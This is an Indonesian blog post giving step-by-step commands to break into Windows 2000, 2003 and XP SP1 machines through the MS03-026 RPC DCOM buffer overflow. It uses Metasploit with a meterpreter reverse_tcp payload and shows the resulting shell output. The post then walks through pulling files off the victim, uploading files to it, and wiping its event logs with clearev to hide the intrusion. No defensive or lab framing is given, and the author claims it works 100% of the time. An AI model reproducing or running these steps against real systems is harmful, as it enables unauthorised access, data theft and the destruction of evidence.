Social Icons

Pages

Minggu, 21 November 2010

Menembus Windows 2000, 2003, XP SP1




Dasar Teori
===========
Bugs sistem operasi windows salah satunya terjadi stack overflow/ buffer overflow di interface RPC yang mengaktifkan DCOM Component (Distributed Component Object Modul) yang secara default instalasi memang di aktifkan oleh windows yang dalam protokol Netbios, DCOM di gunakan untuk membuka interface komunikasi dengan komputer lain yang mengakses sharing file dengan memanfaatkan port 135. Hal ini tentu memungkinkan seorang attacker menyerang port 135 dan memungkinkan attacker bisa mendapatkan akses setingkat AUTHORITY SYSTEM karena RPC running dengan otoritas sistem.

Alat-alat yg digunakan
=======================
OS : Backtrack 4 R1
Target : Windows 2000, 2003, XP SP1
Tools : Metasploit v.3.4
Exploit : ms03_026_dcom
Payload : windows/meterpreter/reverse_tcp
Port : 135

Command yg digunakan
=====================
1. Setting IP static.
root@bt:~#ifconfig eth0 [ip-address]

2. Ping IP target, untuk mengetahui konektifitas komputer target.
root@bt:~#ping [ip-address-target]

3. Scan sistem operasinya dan apakah port 135 terbuka.
root@bt:~# nmap -sS-O [ip-address-target]

4. Login ke Metasploit
root@bt:~#cd /pentest/exploits/framework3
root@bt:/pentest/exploits/framework3#./msfconsole

5. Exploit RPC Dcom dan peroleh shell windows
msf> usewindows/dcerpc/ms03_026_dcom
msfexploit(ms03_026_dcom)> set RHOST [ip-address-target]
msfexploit(ms03_026_dcom)> set LHOST [ip-address]
msfexploit(ms03_026_dcom)> set PAYLOAD windows/meterpreter/reverse_tcp
msfexploit(ms03_026_dcom)> exploit
meterpreter >execute -H -f cmd.exe –i (Get Shell Windows)
Process1116 created.
Channel 2 created.
Microsoft WindowsXP [Version5.1.2600]
(C) Copyright1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

6. Download File
Meterpreter > download [path-source-target][path-source-local]
Example:Download Sunset.jpg
meterpreter > download C:\\'Documents and Settings'/'All Users'/Documents/'My
Pictures'/'SamplePictures'/Sunset.jpg /root/

7. Upload File
Meterpreter > upload [path-source-local][path-source-target]
Example:Upload install.sh
meterpreter >upload /root/install.sh C:\\'Documents and
Settings'/Administrator/Desktop/

8. Erase Log File
meterpreter >clearev

Note:
[using help command]: meterpreter> ?

Perintah diatas sudah diuji cobakan dengan berhasil 100%

0 komentar:

Posting Komentar